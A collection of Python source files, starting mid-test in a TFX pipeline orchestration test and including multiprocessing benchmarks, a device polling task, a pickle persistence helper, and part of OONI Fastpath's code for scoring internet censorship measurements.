manual_task_scheduler.NODE_STATE_PROPERTY_KEY)
node_state = manual_task_scheduler.ManualNodeState.from_mlmd_value(
node_state_mlmd_value)
self.assertEqual(node_state.state,
manual_task_scheduler.ManualNodeState.COMPLETED)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_update_node_state_tasks_handling(self, mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline(
'pipeline1', execution_mode=pipeline_pb2.Pipeline.SYNC)
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
eg_node_uid = task_lib.NodeUid(pipeline_uid, 'ExampleGen')
transform_node_uid = task_lib.NodeUid(pipeline_uid, 'Transform')
trainer_node_uid = task_lib.NodeUid(pipeline_uid, 'Trainer')
evaluator_node_uid = task_lib.NodeUid(pipeline_uid, 'Evaluator')
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state:
# Set initial states for the nodes.
with pipeline_state.node_state_update_context(
eg_node_uid) as node_state:
node_state.update(pstate.NodeState.RUNNING)
with pipeline_state.node_state_update_context(
transform_node_uid) as node_state:
node_state.update(pstate.NodeState.STARTING)
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STARTED)
with pipeline_state.node_state_update_context(
evaluator_node_uid) as node_state:
node_state.update(pstate.NodeState.RUNNING)
mock_sync_task_gen.return_value.generate.side_effect = [
[
task_lib.UpdateNodeStateTask(
node_uid=eg_node_uid, state=pstate.NodeState.COMPLETE),
task_lib.UpdateNodeStateTask(
node_uid=trainer_node_uid, state=pstate.NodeState.RUNNING),
task_lib.UpdateNodeStateTask(
node_uid=evaluator_node_uid,
state=pstate.NodeState.FAILED,
status=status_lib.Status(
code=status_lib.Code.ABORTED, message='foobar error'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(1, mock_sync_task_gen.return_value.generate.call_count)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(pstate.NodeState.COMPLETE,
pipeline_state.get_node_state(eg_node_uid).state)
self.assertEqual(
pstate.NodeState.STARTED,
pipeline_state.get_node_state(transform_node_uid).state)
self.assertEqual(pstate.NodeState.RUNNING,
pipeline_state.get_node_state(trainer_node_uid).state)
self.assertEqual(
pstate.NodeState.FAILED,
pipeline_state.get_node_state(evaluator_node_uid).state)
self.assertEqual(
status_lib.Status(
code=status_lib.Code.ABORTED, message='foobar error'),
pipeline_state.get_node_state(evaluator_node_uid).status)
if __name__ == '__main__':
tf.test.main()
|
mp_benchmarks.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, multiprocessing, threading, Queue, gc
if sys.platform == 'win32':
_timer = time.clock
else:
_timer = time.time
delta = 1
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
for i in xrange(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
print iterations, 'objects passed through the queue in', elapsed, 'seconds'
print 'average number/sec:', iterations/elapsed
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
for i in xrange(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
print iterations, 'objects passed through connection in',elapsed,'seconds'
print 'average number/sec:', iterations/elapsed
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in xrange(iterations):
a = seq[5]
elapsed = _timer()-t
print iterations, 'iterations in', elapsed, 'seconds'
print 'average number/sec:', iterations/elapsed
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in xrange(iterations):
l.acquire()
l.release()
elapsed = _timer()-t
print iterations, 'iterations in', elapsed, 'seconds'
print 'average number/sec:', iterations/elapsed
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
for i in xrange(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
for i in xrange(iterations):
c.notify()
c.wait()
elapsed = _timer()-t
c.release()
p.join()
print iterations * 2, 'waits in', elapsed, 'seconds'
print 'average number/sec:', iterations * 2 / elapsed
####
def test():
manager = multiprocessing.Manager()
gc.disable()
print '\n\t######## testing Queue.Queue\n'
test_queuespeed(threading.Thread, Queue.Queue(),
threading.Condition())
print '\n\t######## testing multiprocessing.Queue\n'
test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
multiprocessing.Condition())
print '\n\t######## testing Queue managed by server process\n'
test_queuespeed(multiprocessing.Process, manager.Queue(),
manager.Condition())
print '\n\t######## testing multiprocessing.Pipe\n'
test_pipespeed()
print
print '\n\t######## testing list\n'
test_seqspeed(range(10))
print '\n\t######## testing list managed by server process\n'
test_seqspeed(manager.list(range(10)))
print '\n\t######## testing Array("i", ..., lock=False)\n'
test_seqspeed(multiprocessing.Array('i', range(10), lock=False))
print '\n\t######## testing Array("i", ..., lock=True)\n'
test_seqspeed(multiprocessing.Array('i', range(10), lock=True))
print
print '\n\t######## testing threading.Lock\n'
test_lockspeed(threading.Lock())
print '\n\t######## testing threading.RLock\n'
test_lockspeed(threading.RLock())
print '\n\t######## testing multiprocessing.Lock\n'
test_lockspeed(multiprocessing.Lock())
print '\n\t######## testing multiprocessing.RLock\n'
test_lockspeed(multiprocessing.RLock())
print '\n\t######## testing lock managed by server process\n'
test_lockspeed(manager.Lock())
print '\n\t######## testing rlock managed by server process\n'
test_lockspeed(manager.RLock())
print
print '\n\t######## testing threading.Condition\n'
test_conditionspeed(threading.Thread, threading.Condition())
print '\n\t######## testing multiprocessing.Condition\n'
test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
print '\n\t######## testing condition managed by a server process\n'
test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
SICS.py
|
from threading import Thread
from time import sleep
import requests
from core.data.command import Command
from core.device.manager import DeviceManager
from core.task.abstract import BaseTask
class MeasureWeight(BaseTask):
def __init__(self, config):
self.__dict__.update(config)
required = ['sleep_period', 'device_id', 'task_id']
self.validate_attributes(required, type(self).__name__)
self.device = DeviceManager().get_device(self.device_id)
super(MeasureWeight, self).__init__()
def start(self):
t = Thread(target=self._run)
t.start()
def _run(self):
while self.is_active:
cmd = Command(self.device_id, "1", [], self.task_id)
self.device.post_command(cmd)
sleep(int(self.sleep_period))
def end(self):
self.is_active = False
|
modulo_serializar.py
|
# License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Andree Avalos
import pickle
import threading
path = 'data/dict/'
def commit(objeto, nombre):
try:
file = open(path+nombre+".bin","wb+")
file.write(pickle.dumps(objeto))
file.close()
except:
''
def rollback(nombre):
try:
file = open(path+nombre+".bin", "rb")
b = file.read()
file.close()
return pickle.loads(b)
except:
return {}
def hacerCommit(objeto, nombre):
h1 = threading.Thread(target=commit, args=(objeto, nombre), daemon= True)
h1.start()
|
core.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
OONI Fastpath
See README.adoc
"""
# Compatible with Python3.6 and 3.7 - linted with Black
# debdeps: python3-setuptools
from argparse import ArgumentParser, Namespace
from base64 import b64decode
from configparser import ConfigParser
from datetime import datetime
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Iterator, Dict, Any
import hashlib
import logging
import multiprocessing as mp
import os
import sys
import time
import yaml
import ujson # debdeps: python3-ujson
try:
from systemd.journal import JournalHandler # debdeps: python3-systemd
no_journal_handler = False
except ImportError:
# this will be the case on macOS for example
no_journal_handler = True
# Feeds measurements from S3
import fastpath.s3feeder as s3feeder
# Feeds measurements from a local HTTP API
from fastpath.localhttpfeeder import start_http_api
# Push measurements into Postgres
import fastpath.db as db
from fastpath.metrics import setup_metrics
from fastpath.mytypes import MsmtTup
import fastpath.portable_queue as queue
import fastpath.utils
LOCALITY_VALS = ("general", "global", "country", "isp", "local")
NUM_WORKERS = 3
log = logging.getLogger("fastpath")
metrics = setup_metrics(name="fastpath")
conf = Namespace()
fingerprints = None
def parse_date(d):
return datetime.strptime(d, "%Y-%m-%d").date()
def setup_dirs(conf, root):
"""Setup directories creating them if needed"""
conf.vardir = root / "var/lib/fastpath"
conf.cachedir = conf.vardir / "cache"
conf.s3cachedir = conf.cachedir / "s3"
# conf.outdir = conf.vardir / "output"
for p in (
conf.vardir,
conf.cachedir,
conf.s3cachedir,
):
p.mkdir(parents=True, exist_ok=True)
def setup():
os.environ["TZ"] = "UTC"
global conf
ap = ArgumentParser(__doc__)
ap.add_argument("--start-day", type=lambda d: parse_date(d))
ap.add_argument("--end-day", type=lambda d: parse_date(d))
ap.add_argument("--devel", action="store_true", help="Devel mode")
ap.add_argument("--noapi", action="store_true", help="Do not start API feeder")
ap.add_argument("--stdout", action="store_true", help="Log to stdout")
ap.add_argument("--db-uri", help="Database DSN or URI.")
ap.add_argument(
"--update",
action="store_true",
help="Update summaries and files instead of logging an error",
)
ap.add_argument(
"--stop-after", type=int, help="Stop after feeding N measurements", default=None
)
ap.add_argument(
"--no-write-to-db",
action="store_true",
help="Do not insert measurement in database",
)
ap.add_argument(
"--keep-s3-cache",
action="store_true",
help="Keep files downloaded from S3 in the local cache",
)
conf = ap.parse_args()
if conf.devel or conf.stdout or no_journal_handler:
format = "%(relativeCreated)d %(process)d %(levelname)s %(name)s %(message)s"
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format=format)
else:
log.addHandler(JournalHandler(SYSLOG_IDENTIFIER="fastpath"))
log.setLevel(logging.DEBUG)
# Run inside current directory in devel mode
root = Path(os.getcwd()) if conf.devel else Path("/")
conf.conffile = root / "etc/ooni/fastpath.conf"
log.info("Using conf file %s", conf.conffile)
cp = ConfigParser()
with open(conf.conffile) as f:
cp.read_file(f)
conf.collector_hostnames = cp["DEFAULT"]["collectors"].split()
log.info("collectors: %s", conf.collector_hostnames)
conf.s3_access_key = cp["DEFAULT"]["s3_access_key"].strip()
conf.s3_secret_key = cp["DEFAULT"]["s3_secret_key"].strip()
if conf.db_uri is None:
conf.db_uri = cp["DEFAULT"]["db_uri"].strip()
setup_dirs(conf, root)
def per_s(name, item_count, t0):
"""Generate a gauge metric of items per second"""
delta = time.time() - t0
if delta > 0:
metrics.gauge(f"{name}_per_s", item_count / delta)
@metrics.timer("clean_caches")
def clean_caches():
"""Cleanup local caches."""
# Access times are updated on file load.
# FIXME: use cache locations correctly
now = time.time()
threshold = 3600 * 24 * 3
for f in conf.s3cachedir.iterdir():
if not f.is_file():
continue
age_s = now - f.stat().st_atime
if age_s > threshold:
log.debug("Deleting %s", f)
metrics.gauge("deleted_cache_file_age", age_s)
# TODO: delete
# Currently unused: we could warn on missing / unexpected cols
expected_colnames = {
"accessible",
"advanced",
"agent",
"annotations",
"automated_testing",
"blocking",
"body_length_match",
"body_proportion",
"blocking_country",
"blocking_general",
"blocking_global",
"blocking_isp",
"blocking_local",
"client_resolver",
"control",
"control_failure",
"data_format_version",
"dns_consistency",
"dns_experiment_failure",
"engine_name",
"engine_version",
"engine_version_full",
"failure",
"failure_asn_lookup",
"failure_cc_lookup",
"failure_ip_lookup",
"failure_network_name_lookup",
"flavor",
"headers_match",
"http_experiment_failure",
"id",
"input",
"input_hashes",
"measurement_start_time",
"network_type",
"options",
"origin",
"phase_result",
"platform",
"probe_asn",
"probe_cc",
"probe_city",
"probe_ip",
"queries",
"receiver_data",
"registration_server_failure",
"registration_server_status",
"report_id",
"requests",
"retries",
"sender_data",
"server_address",
"server_port",
"server_version",
"simple",
"socksproxy",
"software_name",
"software_version",
"status_code_match",
"summary_data",
"tcp_connect",
"telegram_http_blocking",
"telegram_tcp_blocking",
"telegram_web_failure",
"telegram_web_status",
"test_c2s",
"test_helpers",
"test_name",
"test_runtime",
"test_s2c",
"test_start_time",
"test_suite",
"test_version",
"test_keys",
"title_match",
"web_connectivity",
"whatsapp_endpoints_blocked",
"whatsapp_endpoints_dns_inconsistent",
"whatsapp_endpoints_status",
"whatsapp_web_failure",
"whatsapp_web_status",
}
def prepare_for_json_normalize(report):
try:
d = report["test_keys"]["control"]["tcp_connect"]
d = {n: i for n, i in enumerate(d.items())}
report["test_keys"]["control"]["tcp_connect"] = tuple(d.items())
except KeyError:
pass
try:
h = report["test_keys"]["control"]["http_request"]["headers"]
report["test_keys"]["control"]["http_request"]["headers"] = tuple(h.items())
except KeyError:
pass
def process_measurements_from_s3(queue):
"""Pull measurements from S3 and place them in the queue"""
for measurement_tup in s3feeder.stream_cans(conf, conf.start_day, conf.end_day):
assert len(measurement_tup) == 3
msm_jstr, msm, msm_uid = measurement_tup
assert msm_jstr is None or isinstance(msm_jstr, (str, bytes)), type(msm_jstr)
assert msm is None or isinstance(msm, dict)
while queue.qsize() >= 500:
time.sleep(0.1)
assert measurement_tup is not None
queue.put(measurement_tup)
metrics.gauge("queue_size", queue.qsize())
@metrics.timer("match_fingerprints")
def match_fingerprints(measurement):
"""Match fingerprints against HTTP headers and bodies.
Used only on web_connectivity
"""
msm_cc = measurement["probe_cc"]
zzfps = fingerprints["ZZ"]
ccfps = fingerprints.get(msm_cc, {})
test_keys = measurement.get("test_keys", None)
if test_keys is None:
return []
matches = []
requests = test_keys.get("requests", ()) or ()
for req in requests:
r = req.get("response", None)
if r is None:
continue
# Match HTTP body if found
body = r["body"]
if isinstance(body, dict):
if "data" in body and body.get("format", "") == "base64":
log.debug("Decoding base64 body")
body = b64decode(body["data"])
# returns bytes. bm.encode() below is faster that decoding it
else:
logbug(2, "incorrect body of type dict", measurement)
body = None
if body is not None:
for fp in zzfps["body_match"] + ccfps.get("body_match", []):
# fp: {"body_match": "...", "locality": "..."}
tb = time.time()
bm = fp["body_match"]
if isinstance(body, bytes):
idx = body.find(bm.encode())
else:
idx = body.find(bm)
if idx != -1:
matches.append(fp)
log.debug("matched body fp %s %r at pos %d", msm_cc, bm, idx)
# Used for statistics
metrics.gauge("fingerprint_body_match_location", idx)
per_s("fingerprints_bytes", len(body), tb)
del body
# Match HTTP headers if found
headers = r.get("headers", {})
if not headers:
continue
headers = {h.lower(): v for h, v in headers.items()}
for fp in zzfps["header_full"] + ccfps.get("header_full", []):
name = fp["header_name"]
if name in headers and headers[name] == fp["header_full"]:
matches.append(fp)
log.debug("matched header full fp %s %r", msm_cc, fp["header_full"])
for fp in zzfps["header_prefix"] + ccfps.get("header_prefix", []):
name = fp["header_name"]
prefix = fp["header_prefix"]
if name in headers and headers[name].startswith(prefix):
matches.append(fp)
log.debug("matched header prefix %s %r", msm_cc, prefix)
return matches
def all_keys_true(d, keys):
"""Check for values set to True in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, None) != True:
return False
return True
def all_keys_false(d, keys):
"""Check for values set to True in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, None) != False:
return False
return True
def all_keys_none(d, keys):
"""Check for values set to None in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, True) != None:
return False
return True
def logbug(id: int, desc: str, msm: dict):
"""Log unexpected measurement contents, possibly due to a bug in the probe
The id helps locating the call to logbug()
"""
# Current highest logbug id: 7
# TODO: use assertions for unknown bugs
rid = msm.get("report_id", "")
url = "https://explorer.ooni.org/measurement/{}".format(rid) if rid else "no rid"
sname = msm.get("software_name", "unknown")
sversion = msm.get("software_version", "unknown")
if id > 0:
# unknown, possibly new bug
log.warning("probe_bug %d: %s %s %s %s", id, sname, sversion, desc, url)
else:
log.info("known_probe_bug: %s %s %s %s", sname, sversion, desc, url)
def _detect_unknown_failure(tk):
"""Any field ending with _failure can contain `unknown_failure ...`
due to failed msmt
"""
for k in tk:
if k.endswith("_failure"):
v = tk[k] or ""
if v.startswith("unknown_failure"):
log.debug(f"unknown_failure in field {k}")
return True
return False
@metrics.timer("score_measurement_facebook_messenger")
def score_measurement_facebook_messenger(msm):
tk = msm["test_keys"]
del msm
# TODO: recompute all these keys in the pipeline
# If the value of these keys is false (inconsistent) there is something
# fishy
consistency_keys = [
"facebook_b_api_dns_consistent",
"facebook_b_api_reachable",
"facebook_b_graph_dns_consistent",
"facebook_b_graph_reachable",
"facebook_edge_dns_consistent",
"facebook_edge_reachable",
"facebook_external_cdn_dns_consistent",
"facebook_external_cdn_reachable",
"facebook_scontent_cdn_dns_consistent",
"facebook_scontent_cdn_reachable",
"facebook_star_dns_consistent",
"facebook_star_reachable",
"facebook_stun_dns_consistent",
]
# These are keys that if they are true it means there is something fishy
anomaly_keys = ["facebook_tcp_blocking", "facebook_dns_blocking"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# Workaround for 'facebook_dns_blocking': True
# See tests/test_functional.py:test_facebook_messenger*
trues = (
"facebook_b_api_dns_consistent",
"facebook_b_api_reachable",
"facebook_b_graph_dns_consistent",
"facebook_b_graph_reachable",
"facebook_dns_blocking",
"facebook_edge_dns_consistent",
"facebook_edge_reachable",
"facebook_star_dns_consistent",
"facebook_star_reachable",
"facebook_stun_dns_consistent",
)
if all_keys_true(tk, trues) and all_keys_false(tk, "facebook_tcp_blocking"):
score = 0
else:
score = 0
for key in consistency_keys:
v = tk.get(key, None)
if v == False:
score += 0.5
scores[key] = v
for key in anomaly_keys:
v = tk.get(key, None)
if v == True:
score += 0.5
scores[key] = v
scores["blocking_general"] = score
return scores
def _extract_tcp_connect(tk):
# https://github.com/ooni/spec/blob/master/data-formats/df-005-tcpconnect.md
# NOTE: this is *NOT* ts-008-tcp-connect.md
# First the probe tests N TCP connections
tcp_connect = tk.get("tcp_connect", [])
accessible_endpoints = 0
unreachable_endpoints = 0
for entry in tcp_connect:
s = entry.get("status", {})
success = s.get("success", None)
if success is True:
accessible_endpoints += 1
elif success is False:
unreachable_endpoints += 1
else:
pass # unknown
return accessible_endpoints, unreachable_endpoints
@metrics.timer("score_measurement_telegram")
def score_measurement_telegram(msm):
"""Calculate measurement scoring for Telegram.
Returns a scores dict
"""
# Ignore tcp_blocking, http_blocking and web_failure from the probe
tk = msm["test_keys"]
del msm
web_status = tk.get("telegram_web_status", None)
if web_status == "ok":
web_blocking = False
elif web_status == "blocked":
web_blocking = True
else:
# unknown
web_blocking = None
accessible_endpoints, unreachable_endpoints = _extract_tcp_connect(tk)
# Then the probe tests N HTTP connections
http_success_cnt = 0
http_failure_cnt = 0
web_failure = None
requests = tk.get("requests", ()) or ()
for request in requests:
if "request" not in request:
# client bug
continue
if request["request"]["url"] in (
"https://web.telegram.org/",
"http://web.telegram.org/",
):
if request["failure"] is not None:
web_failure = request["failure"]
# TODO extract_html_title(request["response"]["body"] and check if
# it matches "Telegram Web"
# see: https://github.com/measurement-kit/measurement-kit/blob/f63ed8b7f186dbb27cf32489216826752d070620/src/libmeasurement_kit/ooni/telegram.cpp#L101
# We skip the telegram web requests for counting the
# http_success_cnt
continue
if request["failure"] is None:
http_success_cnt += 1
else:
# TODO also consider looking at request["response"]["body"] to
# match the expected telegram backend response
http_failure_cnt += 1
# Scoring
if (accessible_endpoints + unreachable_endpoints) > 0:
s = unreachable_endpoints / (accessible_endpoints + unreachable_endpoints)
else:
s = 0.5
if (http_failure_cnt + http_success_cnt) > 0:
s += http_failure_cnt / (http_failure_cnt + http_success_cnt)
else:
s += 0.5
if web_blocking:
s += 1
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["blocking_general"] = s
scores["web_failure"] = web_failure
scores["accessible_endpoints"] = accessible_endpoints
scores["unreachable_endpoints"] = unreachable_endpoints
scores["http_success_cnt"] = http_success_cnt
scores["http_failure_cnt"] = http_failure_cnt
if web_failure is not None:
scores["msg"] = "Telegam failure: {}".format(web_failure)
return scores
@metrics.timer("score_measurement_hhfm")
def score_measurement_hhfm(msm):
"""Calculate http_header_field_manipulation"""
tk = msm["test_keys"]
rid = msm["report_id"]
del msm
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# See test_functional.py:test_score_measurement_hhfm_stats
#
# exp_req_failure = tk["requests"][0].get("failure", None)
# if exp_req_failure is not None:
# # failure state set by probe
# scores["blocking_general"] = 0.5
# return scores
# response->body contains a JSON document like:
# {"headers_dict": {"acCePT-languagE": ["en-US,en;q=0.8"], ...},
# "request_line": "geT / HTTP/1.1",
# "request_headers": [ ["Connection", "close"], ... ]
# }
try:
resp = tk["requests"][0].get("response", {})
except (KeyError, IndexError):
# See 20191028T115649Z_AS28573_eIrzDM4njwMjxBi0ODrerI5N03zM7qQoCvl4xpapTccdW0kCRg"
scores["blocking_general"] = 0.0
return scores
# See 20191027T002012Z_AS45595_p2qNg0FmL4d2kIuLQXEn36MbraErPPA5i64eE1e6nLfGluHpLk
if resp is None:
# Broken test?
scores["blocking_general"] = 0.0
return scores
resp_body = resp.get("body", None)
if resp_body is None:
scores["total_tampering"] = True
scores["blocking_general"] = 1.0
scores["msg"] = "Empty body"
return scores
# Compare sent and received HTTP headers
try:
ctrl_headers = ujson.loads(resp_body)["headers_dict"]
except:
scores["blocking_general"] = 1.0
scores["msg"] = "Malformed ctrl_headers"
return scores
# "unpack" value and turn into a set of tuples to run a comparison
ctrl = set((k, v[0]) for k, v in ctrl_headers.items())
exp_req_headers = tk["requests"][0].get("request", {}).get("headers", {})
expected = set(exp_req_headers.items())
# The "Connection" header is not always handled correctly
ctrl.discard(("Connection", "close"))
expected.discard(("Connection", "close"))
if expected == ctrl:
return scores
# Headers have been manipulated!
scores["blocking_general"] = 1.1
diff = expected ^ ctrl
scores["msg"] = "{} unexpected header change".format(len(diff))
# TODO: distinguish proxies lowercasing/fixing headers
# or adding "benign" Via, Connection, X-BlueCoat-Via, X-Forwarded-For
# headers?
return scores
@metrics.timer("score_http_invalid_request_line")
def score_http_invalid_request_line(msm):
"""Calculate measurement scoring for http_invalid_request_line"""
# https://github.com/ooni/spec/blob/master/nettests/ts-007-http-invalid-request-line.md
tk = msm["test_keys"]
rid = msm["report_id"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
sent = tk.get("sent", [])
received = tk.get("received", [])
if not len(sent) and not len(received):
scores["accuracy"] = 0.0
return scores
# Compare sent and received HTTP headers
anomaly = False
for s, r in zip(sent, received):
if s != r:
anomaly = True
# We ignore the tampering flag due to: https://github.com/ooni/probe/issues/1278
# tampering = tk.get("tampering", False)
# if tampering != anomaly:
# scores["accuracy"] = 0.0
# logbug(6, "Incorrect tampering flag", msm)
# return scores
# Headers have been manipulated!
if anomaly:
scores["blocking_general"] = 1.0
return scores
@metrics.timer("score_measurement_whatsapp")
def score_measurement_whatsapp(msm):
"""Calculate measurement scoring for Whatsapp.
Returns a scores dict
"""
# https://github.com/ooni/spec/blob/master/nettests/ts-018-whatsapp.md
# TODO: check data_format_version?
score = 0
tk = msm["test_keys"]
# msg = ""
# for req in msm.get("requests", []):
# if "X-FB-TRIP-ID" not in req.get("response", {}).get("headers", {}):
# score += 0.2
# msg += "Missing HTTP header"
# Disabled due to bug in the probe https://github.com/ooni/probe-engine/issues/341
# if tk.get("registration_server_status", "ok") != "ok":
# score += 0.2
# if tk.get("whatsapp_web_failure", None) != None:
# score += 0.2
# if tk.get("whatsapp_endpoints_status", "ok") != "ok":
# score += 0.2
# if tk.get("whatsapp_web_status", "ok") != "ok":
# # TODO: recalculate using HTML body title
# score += 0.2
# if tk.get("whatsapp_endpoints_dns_inconsistent", []) != []:
# score += 0.2
# if tk.get("whatsapp_endpoints_blocked", []) != []:
# score += 0.2
# registration_server_failure = tk.get("registration_server_failure", None)
# if registration_server_failure is not None:
# if registration_server_failure.startswith("unknown_failure"):
# # Client error
# # TODO: implement confidence = 0
# score = 0
# else:
# score += 0.2
if (
msm.get("software_name", "") == "ooniprobe"
and msm.get("software_version", "") in ("2.1.0", "2.2.0", "2.3.0")
and tk.get("whatsapp_web_status", "") == "blocked"
):
# The probe is reporting a false positive: due to the empty client headers
# it hits https://www.whatsapp.com/unsupportedbrowser
if score == 0.2:
score = 0
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# TODO: refactor
if _detect_unknown_failure(tk):
scores["accuracy"] = 0.0
wf = tk.get("whatsapp_web_failure", "")
if wf and "unknown_failure 'ascii' co" in wf:
assert msm["report_id"]
scores["accuracy"] = 0.0
return scores
requests = tk.get("requests", ()) or ()
if not requests:
assert msm["report_id"]
scores["accuracy"] = 0.0
return scores
# TODO: carve out in a general function
webapp_accessible = None
registration_accessible = None
for b in requests:
url = b.get("request", {}).get("url", "")
if url == "https://web.whatsapp.com/":
webapp_accessible = b.get("failure", True) in (None, "", False)
# TODO: handle cases where the certificate is invalid or the page
# has unexpected contents
# Also note bug https://github.com/ooni/probe-legacy/issues/60
# TODO: handle elif url == "http://web.whatsapp.com/":
elif url == "https://v.whatsapp.net/v2/register":
# In case of connection failure "response" might be empty
registration_accessible = b.get("failure", None) == None
if webapp_accessible is None or registration_accessible is None:
# bug e.g. 20190101T191128Z_AS34594_ZCyS8OE3SSvRwLeuiAeiklVZ8H91hEfY0Ook7ljgfotgpQklhv
scores["accuracy"] = 0.0
return scores
if webapp_accessible is not True or registration_accessible is not True:
scores["blocking_general"] = 1.0
return scores
accessible_endpoints, unreachable_endpoints = _extract_tcp_connect(tk)
if not accessible_endpoints and not unreachable_endpoints:
scores["accuracy"] = 0.0
elif accessible_endpoints > 0:
pass # we call it OK
else:
scores["blocking_general"] = 1.0
scores["analysis"] = dict(
registration_server_accessible=registration_accessible,
whatsapp_web_accessible=webapp_accessible,
whatsapp_endpoints_accessible=accessible_endpoints > 0,
)
return scores
@metrics.timer("score_vanilla_tor")
def score_vanilla_tor(msm):
"""Calculate measurement scoring for Tor (test_name: vanilla_tor)
Returns a scores dict
"""
tk = msm["test_keys"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
nks = ("error", "success", "tor_log", "tor_progress_summary", "tor_progress_tag")
if msm["software_name"] == "ooniprobe" and all_keys_none(tk, nks):
if tk["tor_progress"] == 0:
# client bug?
scores["msg"] = "Client bug"
return scores
tor_log = tk.get("tor_log", None)
if tor_log is None:
# unknown bug
return scores
if (
"Bootstrapped 100%: Done" in tor_log
or "Bootstrapped 100% (done): Done" in tor_log
):
# Success
return scores
progress = float(tk.get("tor_progress", 0))
progress = min(100, max(0, progress))
# If the Tor bootstrap reaches, for example, 80% maybe it's being heavily
# throttled or it's just a very slow network: blocking score is set to 0.68
scores["blocking_general"] = 1.0 - progress * 0.004
return scores
@metrics.timer("score_web_connectivity")
def score_web_connectivity(msm, matches) -> dict:
"""Calculate measurement scoring for web connectivity
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS} # type: Dict[str, Any]
if len(matches):
scores["confirmed"] = True
tk = msm.get("test_keys", None)
if tk is None:
logbug(9, "test_keys is None", msm)
scores["accuracy"] = 0.0
return scores
for m in matches:
l = "blocking_" + m["locality"]
scores[l] += 1.0
# "title_match" is often missing from the raw msmt
# e.g. 20190912T145602Z_AS9908_oXVmdAo2BZ2Z6uXDdatwL9cN5oiCllrzpGWKY49PlM4vEB03X7
tm = tk.get("title_match", None)
if tm not in (True, False, None):
logbug(1, "incorrect title_match", msm)
scores["accuracy"] = 0.0
return scores
# Do not score title_match=False - see #360
# if tm is False:
# scores["blocking_general"] += 0.5
# # TODO: scan HTML body for title instead
# body_proportion can be missing
# Commented out to use the same logic as traditional pipeline
# TODO: enable it after doing statistics on body proportion
# http://www3.cs.stonybrook.edu/~phillipa/papers/JLFG14.pdf
# if "body_proportion" in tk:
# bp = tk["body_proportion"]
# delta = abs((tk["body_proportion"] or 1.0) - 1.0)
# scores["blocking_general"] += delta
# TODO: refactor to apply to all test types
blocking_types = ("tcp_ip", "dns", "http-diff", "http-failure")
if "blocking" not in tk:
logbug(7, "missing blocking field", msm)
scores["accuracy"] = 0.0
elif tk["blocking"] in blocking_types:
scores["blocking_general"] = 1.0
scores["analysis"] = {"blocking_type": tk["blocking"]}
elif tk["blocking"] in (None, False):
pass
else:
logbug(7, "unexpected value for blocking", msm)
scores["analysis"] = {"msg": "Unsupported blocking type"}
scores["accuracy"] = 0.0
# TODO: refactor
if _detect_unknown_failure(tk):
scores["accuracy"] = 0.0
# TODO: add heuristic to split blocking_general into local/ISP/country/global
scores["blocking_general"] += (
scores["blocking_country"]
+ scores["blocking_global"]
+ scores["blocking_isp"]
+ scores["blocking_local"]
)
return scores
@metrics.timer("score_ndt")
def score_ndt(msm) -> dict:
"""Calculate measurement scoring for NDT
Returns a scores dict
"""
